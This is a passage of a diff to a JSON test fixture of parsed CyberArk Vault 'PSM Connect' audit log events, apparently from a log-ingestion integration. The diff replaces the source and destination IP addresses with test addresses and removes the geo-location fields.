Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Connect", "issuer": "Administrator", "extra_details": { @@ -1699,21 +1491,21 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "f5725611-ca57-4a2a-a089-f45b3174a358", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115" + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15" }, "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Connect", "timestamp": "Mar 15 07:08:06", "desc": "PSM Connect" @@ -1724,8 +1516,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936298200Z", - "original": "\u003c5\u003e1 2021-03-15T14:08:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:08:06\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:08:06Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:08:06\",\"IsoTimestamp\":\"2021-03-15T14:08:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331203Z", + "original": "\u003c5\u003e1 2021-03-15T14:08:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:08:06\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:08:06Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:08:06\",\"IsoTimestamp\":\"2021-03-15T14:08:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", @@ -1748,39 +1540,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1797,7 +1568,7 @@ }, "@timestamp": "2021-03-15T14:08:28.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -1808,16 +1579,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T14:08:28Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:08:28\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:08:28Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615814025\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:08:28\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:08:28Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615814025\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Connect", "issuer": "Administrator", "extra_details": { @@ -1829,15 +1599,15 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "7db90436-8a1a-4203-9a96-65137625ab2d", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115" + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15" }, "rfc5424": true, "ca_properties": { "other": { "use_sudo_on_reconcile": "Yes" }, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -1850,9 +1620,9 @@ "cpm_error_details": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", "last_fail_date": "1615814025" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Connect", "timestamp": "Mar 15 07:08:28", "desc": "PSM Connect" @@ -1863,8 +1633,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936301800Z", - "original": "\u003c5\u003e1 2021-03-15T14:08:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:08:28\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:08:28Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814025\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:08:28\",\"IsoTimestamp\":\"2021-03-15T14:08:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814025\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331207100Z", + "original": "\u003c5\u003e1 2021-03-15T14:08:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:08:28\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:08:28Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814025\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 